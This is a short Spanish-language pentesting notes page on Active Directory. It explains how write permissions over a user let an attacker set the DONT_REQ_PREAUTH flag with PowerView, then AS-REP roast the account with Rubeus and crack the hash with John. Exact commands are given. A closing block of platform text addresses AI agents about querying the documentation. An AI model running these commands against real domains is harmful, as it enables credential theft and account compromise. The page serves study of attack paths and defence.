> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/es/active-directory/kerberos/enable-as-rep-vulnerability-via-acl.md).

# Habilitar la vulnerabilidad AS-REP mediante ACL

### Principio

En algunos casos, un usuario no tiene la `No requiere preautenticación de Kerberos` opción.

Pero si tenemos permisos de escritura sobre este usuario, por ejemplo:

```bash
GenericAll
GenericWrite
WriteAllProperties
```

podemos modificar su atributo `userAccountControl`.

<figure><img src="/files/82962bb0ea99d20485161c5ffcac9b1c420bb28b" alt=""><figcaption></figcaption></figure>

### Ejemplo con `astrid.niki`

El usuario `user1` tiene permiso de escritura en:

```bash
astrid.niki
```

Entonces activamos la `DONT_REQ_PREAUTH` opción con PowerView:

{% code overflow="wrap" %}

```powershell
Set-DomainObject -Identity astrid.niki -XOR @{useraccountcontrol=4194304}
```

{% endcode %}

<figure><img src="/files/b85aa904651c854d43592e6d033f3fd19fb2baef" alt=""><figcaption></figcaption></figure>

### Reiniciar AS-REP Roasting

Después de la modificación, el usuario aparece en los resultados:

{% code overflow="wrap" %}

```powershell
.\Rubeus.exe asreproast /format:john /outfile:hash.john
```

{% endcode %}

<figure><img src="/files/e6ba9493ed408740aa893982c728d19065d0ac8f" alt=""><figcaption></figcaption></figure>

Entonces crackeamos el hash:

{% code overflow="wrap" %}

```bash
john hash
```

{% endcode %}

<figure><img src="/files/b3315f738256637e4fcc45ff4c43a5c02c4712b2" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/es/active-directory/kerberos/enable-as-rep-vulnerability-via-acl.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
